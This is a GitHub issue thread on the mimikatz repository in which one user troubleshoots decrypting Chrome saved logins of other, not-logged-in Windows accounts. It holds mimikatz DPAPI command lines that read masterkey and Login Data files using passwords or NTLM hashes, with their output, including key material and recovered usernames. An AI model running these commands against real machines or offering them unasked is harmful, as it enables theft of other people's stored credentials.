gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

mimikatz can't recover Chrome 80.0.3987 Logins from other user #270

Closed Papotito123 closed 3 years ago

Papotito123 commented 4 years ago

Hello: I can recover Chrome logins in the running OS, but it throws an error when trying to recover logins for other, non-logged-in users.

PC: Win 10 1809 x64. mimikatz 2.2.0 20200229 (DPAPI for RDG). Google Chrome is up to date: Version 80.0.3987.122 (Official Build) (64-bit).

Output:

```
mimikatz # dpapi::chrome /in:"C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect /masterkey:de7753fdbf7873bc6f2f505779366a3962009a3ca62867b754dbc2d803639657c498f0f06d76042a89e91e5bb5b91c5a9ee18708c13039918e7aae56fbf06016
Encrypted Key found in local state file
Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
 * volatile cache: GUID:{9cde3a19-5d21-426e-8c43-0ff4d9b5d457};KeyHash:2efcd21e4dcbdf74316285a2d763320ebfbd6793
 * masterkey     : de7753fdbf7873bc6f2f505779366a3962009a3ca62867b754dbc2d803639657c498f0f06d76042a89e91e5bb5b91c5a9ee18708c13039918e7aae56fbf06016
AES Key is: 3191f7d01223d80f7a011f58391878faaa2b24274a837ee58cef4bfba196f32b

URL     : https://login.live.com/ ( https://login.live.com/login.srf )
Username: zzzzzzzzz@hotmail.com
```

Any help much appreciated.

Papotito123 commented 4 years ago

Hello; I was running the wrong code. Sorry. I practiced until I got it (or I think so).

PC: Win 10 1809 x64. mimikatz 2.2.0 20200229 (DPAPI for RDG). Google Chrome is up to date: Version 80.0.3987.122 (Official Build) (64-bit).

So I found my real issue. I have to use dpapi::masterkey /password:userpassword /protected, not dpapi::masterkey /password:ntlmhash /protected, to get it working when running for local user accounts in the same running OS or local users on another partition.

```
mimikatz # dpapi::masterkey /in:"C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-337365419-192549521-2618175838-1001\7b9f7d6e-f87b-41e6-863c-d881d1155b85" /sid:S-1-5-21-337365419-192549521-2618175838-1001 /password:NTLMhash /protected
MASTERKEYS
  dwVersion          : 00000002 - 2
  szGuid             : {7b9f7d6e-f87b-41e6-863c-d881d1155b85}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  MASTERKEY
    dwVersion        : 00000002 - 2
    salt             : 007774122c2684dd5cf8719563aeba15
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : d65e803e433440cabd9b336f11fea6425b93069a92ce263a9d08b7f893c2d0ecc2e8daf1144181619c4b9d768395e0b70a8936019c910a4ea36060e86e79123a31d1e153b8ac853c9c63b8448e3b654342ad40b3e868f64aa236e816a55f9a08e0ab84676980dca579b289d2f7d87626dc8c36e6b602c6443c6080f2a97c68a7d65b6a7ff832d37c889c3a822516df2d

[backupkey]
  MASTERKEY
    dwVersion        : 00000002 - 2
    salt             : 520115e73c2255170f760e800b5c3e72
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : cd191e8a80a32e349cf67b1a71785d9b36d3795e5babe5682ee6b5a72a369fd48c8d53c9323b454f9825793587ba8dded98793baa2a1bc5a06114cde2597625ee4d8a05c2cb09153e0de474897a8b6690f87ba8538bcb93b9a9e43da87ba7927cd774f91c7f976f215410daffb1a6e2d

[credhist]
  CREDHIST INFO
    dwVersion        : 00000003 - 3
    guid             : {c003f778-a504-48c7-8786-dce648989d75}

[masterkey] with password: NTLMhash (protected user)
ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password
```

Also, something more. If my user account is a MicrosoftAccount login, no matter whether I run dpapi::masterkey /password:userpassword /protected or /password:ntlmhash /protected, it always gives the same error:

```
ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password
```

I thought dpapi::masterkey /password:ntlmhash /protected would work in the average Joe user scenario. Is there something I should be aware of?

Any info will be good.

Thanks.

Papotito123 commented 4 years ago

Hello: Just adding some info to my issue.

I tried:

```
dpapi::masterkey /sid:SID /password:mypassword /protected
dpapi::masterkey sid:SID /password:mypassword /unprotect
dpapi::masterkey sid:SID /hash:ntlmhash /protected
dpapi::masterkey sid:SID /hash:ntlmhash /unprotect
```

but it always throws an error:

```
ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password
```

Thanks for any info.

Papotito123 commented 4 years ago

Hello: Win 10 1809 x64. I can recover Chrome logins in the running OS. I can recover a non-logged-in local user's Chrome logins.

I can recover Chrome logins in a MicrosoftAccount user. I have an issue (?) recovering this MicrosoftAccount user's Chrome logins when not logged in, doing it from another user account. After playing with some commands for some days I thought something might be missing. So I noticed, differently from the other Chrome recoveries, that for this MicrosoftAccount user the dpapi::chrome /unprotect command is not giving 2 GUIDs.

If I use the first GUID I can't grab the masterkey, getting this error:

```
[masterkey] with password: userpassword (protected user)
ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password
```

The specific GUID name pertinent to the URL is not shown; it gives an error, as here:

```
C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200308 Masterkey\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar 8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
Encrypted Key found in local state file
Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {guid-file-name}

URL     : https://login.live.com/ ( https://login.live.com/login.srf )
Username: myemail@hotmail.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption

mimikatz # EXIT
```

Could this {guid-file-name} be grabbed/recovered? As a side note, I tested other Chrome recovery tools and most of them show, for the Chrome login password, a placeholder of .

If I try to perform something that is not possible, please give me a clear and straight answer.

Any info much appreciated.

Papotito123 commented 4 years ago

Hello: Sorry to be so sticky. Win 10 1809 x64. AVAST disabled until restart. Chrome updated to latest.

I created a new local user (Administrator) and saved a Chrome login.

Then I log in to my TESTACCOUNT user and do this to recover Chrome logins from a MicrosoftAccount user (PROBANDO):

```
C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200308 Cache & Masterkey\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar 8 2020 18:30:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
Encrypted Key found in local state file
Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {GUIDname}

URL     : https://login.live.com/ ( https://login.live.com/login.srf )
Username: myemail@hotmail.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption

mimikatz # dpapi::masterkey /in:"C:\Users\PROBANDO\AppData\Roaming\Microsoft\Protect\S-1-5-21-xxxxxxxxxx-1003\GUIDname" /sid:S-1-5-21-xxxxxxxxxxxx-1003 /password:userpassword /protected
```

And it still gives this error:

```
[masterkey] with password: userpassword (protected user)
ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password
```

This is the same procedure I used to recover two other local accounts' Chrome logins from inside the TESTACCOUNT user.

Where is the error?

Thanks in advance.

Papotito123 commented 4 years ago

Hello: Not even this command gives the URL GUID name:

```
mimikatz # dpapi::chrome /state:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Local State" /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
Encrypted Key found in local state file
Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {bb0fd3d0-3daa-4d06-aa93-a282eea027db}

URL     : https://login.live.com/ ( https://login.live.com/login.srf )
Username: myemail@hotmail.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
```

Just keep rolling.